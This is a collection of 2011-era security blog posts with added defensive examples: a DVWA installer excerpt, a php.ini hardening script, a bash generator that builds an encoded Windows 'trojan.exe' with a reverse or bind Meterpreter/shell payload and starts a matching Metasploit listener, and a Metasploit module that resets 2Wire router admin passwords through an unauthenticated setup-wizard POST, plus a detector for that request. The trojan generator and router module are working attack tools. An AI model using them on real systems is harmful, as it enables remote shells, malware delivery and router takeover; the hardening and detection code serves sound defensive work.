echo -e -n "[*] Starting Firefox to DVWA\nUserName: admin\nPassword: password"
firefox http://127.0.0.1/login.php &> /dev/null &
echo -e "\nDone!\n"
echo -e "[\033[1;32m*\033[1;37m] DVWA Install Finished!\n"
==================================================================
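The installer above flips allow_url_include to On because some DVWA exercises need remote file inclusion; on any box that is not a throwaway lab, that one line turns every unvalidated include() into remote code execution. As an added example that is not part of the original post, here is the reverse of that sed one-liner: an audit that reads a php.ini text (the fragment below is constructed), reports the settings that should be Off, and rewrites them idempotently, without the temporary-copy dance. The baseline of settings and reasons is an assumption to extend as you see fit; values followed by an inline `;` comment are deliberately left alone.

```python
"""Audit and harden php.ini settings that a DVWA lab install turns on.

Added example, not part of the original post or of DVWA.
"""
import re

# setting -> (safe value, why it matters). Assumed baseline; extend as needed.
BASELINE = {
    "allow_url_include": ("Off", "include()/require() of URLs enables remote file inclusion"),
    "display_errors":    ("Off", "stack traces and file paths leak to clients"),
    "expose_php":        ("Off", "X-Powered-By header advertises the PHP version"),
    "register_globals":  ("Off", "request parameters silently become PHP variables"),
}

# key, '=', value, with surrounding whitespace captured so rewrites keep the layout.
SETTING = re.compile(r"^(\s*)([A-Za-z_][A-Za-z0-9_.]*)(\s*=\s*)(.*?)(\s*)$")

# Constructed php.ini fragment: the state the installer leaves behind.
SAMPLE_INI = """\
; constructed php.ini fragment
[PHP]
engine = On
allow_url_fopen = On
allow_url_include = On
display_errors = On
expose_php = Off
"""


def _enabled(value: str) -> bool:
    """PHP treats On/1/True/Yes (any case, optionally quoted) as enabled."""
    return value.strip().strip("\"'").lower() in {"on", "1", "true", "yes"}


def _setting(line: str):
    """Return (indent, key, sep, value) for a directive line, None for comments/sections/others."""
    if line.lstrip().startswith((";", "[")):
        return None
    m = SETTING.match(line)
    return (m.group(1), m.group(2), m.group(3), m.group(4)) if m else None


def audit(ini_text: str, baseline=BASELINE):
    """List (line_number, key, current_value, reason) for every baseline setting left enabled."""
    findings = []
    for lineno, line in enumerate(ini_text.splitlines(), 1):
        parsed = _setting(line)
        if parsed is None:
            continue
        _, key, _, value = parsed
        if key in baseline and _enabled(value):
            findings.append((lineno, key, value.strip(), baseline[key][1]))
    return findings


def harden(ini_text: str, baseline=BASELINE) -> str:
    """Rewrite enabled baseline settings to their safe value; running it twice is a no-op."""
    out = []
    for line in ini_text.splitlines():
        parsed = _setting(line)
        if parsed is not None:
            indent, key, sep, value = parsed
            if key in baseline and _enabled(value):
                line = f"{indent}{key}{sep}{baseline[key][0]}"
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for lineno, key, value, reason in audit(SAMPLE_INI):
        print(f"line {lineno}: {key} = {value}  ({reason})")
    print(harden(SAMPLE_INI))
```

Run it against the real file with the same back-up discipline the installer uses (`cp php.ini php.ini.bak` first), then `apachectl configtest` and a service reload; PHP only reads php.ini at startup.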

Thursday, July 14, 2011

Script to simplify using msfpayload & msfencode to create Metasploit payload trojans

The following is a script I coded to simplify using msfpayload and msfencode to create a Windows-based trojan and set up the listener. Let's face it, scripting is faster and easier. It also ensures the result is uniform and automated.

The script will do the following:
  • Determine your IP address automatically for the LHOST of the payload.
  • Ask whether you want a shell or Meterpreter.
  • Ask whether you want a reverse connection or a bind TCP port.
  • Request the port number.
  • At that point it creates two files:
  • trojan.exe - your virus payload
  • msf_Trojan_Listener - a file with a one-liner to create the Metasploit listener that matches your payload.
  • Next it starts msfcli to create the listener.

Here is a screenshot of it in action:

Screen Shot 1 of msf_trojan_generator
Screen Shot 2 of msf_trojan_generator

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#!/bin/bash
ENCODINGTIMES=5
IP=`ifconfig | grep 'inet addr' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
echo -e "\n#######################################"
echo "# MSF Trojan Generator v1.0 #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e "\nYour IP = " $IP
echo -e -n "\n what type of trojan? \n 1) meterpreter \n 2) shell \n\n Which is it: "
read METERORSHELL
echo -e -n "\n What kind of trojan? \n 1) Reverse Connection \n 2) bind_TCP \n\n Which is it: "
read LISTENORREVERSE
echo -e -n "\n What port number are we going to use: "
read PORTNUM

if [ $LISTENORREVERSE = "1" ]; then
 LORR='reverse_tcp'
 LHOST='LHOST='
else
 LORR='bind_tcp'
 LHOST=''
 IP=''
 echo -e "\n Since you want a bind port\nwhat is the IP of the remote host: "
 read REMOTEHOST
 RH='RHOST='
fi

if [ $METERORSHELL = "1" ]; then
 SHELLTYPE='meterpreter'
else
SHELLTYPE='shell'
fi

echo -e "\n[*] Generating trojan with the following: \n -"$SHELLTYPE"/"$LORR "\n -"$LHOST$IP$RH$REMOTEHOST "\n -PORT=" $PORTNUM
echo -e "\n this can take some time. Please wait...\n"

msfpayload windows/$SHELLTYPE/$LORR $LHOST$IP LPORT=$PORTNUM R | msfencode -t exe -o ./trojan.exe -c $ENCODINGTIMES
echo -e "\n[*] Done generating `pwd`/trojan.exe! \n"
ls -l trojan.exe
echo -e "\n[*] Now running listener:\n msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E\n\nNOTE: also saving this to `pwd`/msf_Trojan_Listener for a simple cat/paste later."
echo "msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E" > msf_Trojan_Listener
msfcli multi/handler PAYLOAD=windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM E

==================================================================

Wednesday, June 22, 2011

Metasploit module to reset admin password on 2wire wireless routers.

UPDATE: This module is now a part of Metasploit. Just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see here.

Here is a Metasploit module I coded to reset the password on a 2Wire router. It uses a setup wizard page that doesn't verify whether the user is authenticated, nor remove itself after first-time setup. This can be exploited to reset the password. Without further delay, here is the code.

On my Ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb

=====================================================
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'        => '2Wire Password Reset',
      'Version'     => '$Revision: 1 $',
      'Description' => %Q{
        This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard
        page that fails to check if a user is authenticated and doesn't remove or block after first access.
      },
      'Author'      => 'Travis Phillips',
      'License'     => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin'])
      ], self.class)
  end

  def run
    begin
      print_status("Attempting to reset password to #{datastore['PASSWORD']} on #{rhost}\n")
      res = send_request_cgi(
        {
          'method' => 'POST',
          'uri'    => '/xslt',
          'data'   => 'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] + '&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=',
        }, 25)
      if (res.code == 200)
        if (res.headers['Set-Cookie'])
          print_status("Password reset successful!\n")
        end
      end
    end
  end
end
=====================================================
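What a proxy, IDS or device test harness would look for, as an added example that is not part of the original post or of the Metasploit module: the reset works because the wizard page accepts a POST to /xslt carrying PAGE=H04_POST and a new PASSWORD from anyone, at any time, so the request shape itself is the signature. The parser below takes a raw HTTP/1.1 request and returns a verdict. Both requests are constructed; the router address is an assumption.

```python
"""Flag the 2Wire setup-wizard password-reset request on the wire.

Added example, not part of the original post or of the Metasploit module.
"""
from urllib.parse import parse_qs


def parse_http_request(raw: str):
    """Split a raw HTTP request into (method, path, headers, body); query string is dropped."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), target.split("?", 1)[0], headers, body


def classify(raw: str):
    """Return 'wizard-password-reset' for a POST /xslt that submits the H04 wizard step, else None."""
    method, path, _headers, body = parse_http_request(raw)
    if method != "POST" or path != "/xslt":
        return None
    form = parse_qs(body, keep_blank_values=True)
    # The module's payload: PAGE=H04_POST plus PASSWORD/PASSWORD_CONF, no session required.
    if form.get("PAGE") != ["H04_POST"] or "PASSWORD" not in form:
        return None
    return "wizard-password-reset"


def scan(requests):
    """Run classify() over many requests and return the indexes that matched."""
    return [i for i, raw in enumerate(requests) if classify(raw) is not None]


# Constructed requests. The first has the shape the module sends (password value made up);
# the second is an ordinary page fetch against the same handler.
RESET_REQUEST = (
    "POST /xslt HTTP/1.1\r\n"
    "Host: 192.168.1.254\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 84\r\n\r\n"
    "PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=newpass&PASSWORD_CONF=newpass&HINT="
)
STATUS_REQUEST = "GET /xslt?PAGE=A01 HTTP/1.1\r\nHost: 192.168.1.254\r\n\r\n"

if __name__ == "__main__":
    for raw in (RESET_REQUEST, STATUS_REQUEST):
        print(raw.split("\r\n", 1)[0], "->", classify(raw))
```

The module's own success test points at the missing control: a wizard step that changes the admin password should only be reachable while the device is still in first-boot state or from an authenticated session. Until a firmware fix closes that, keeping the management interface off untrusted segments is what limits who can send this request.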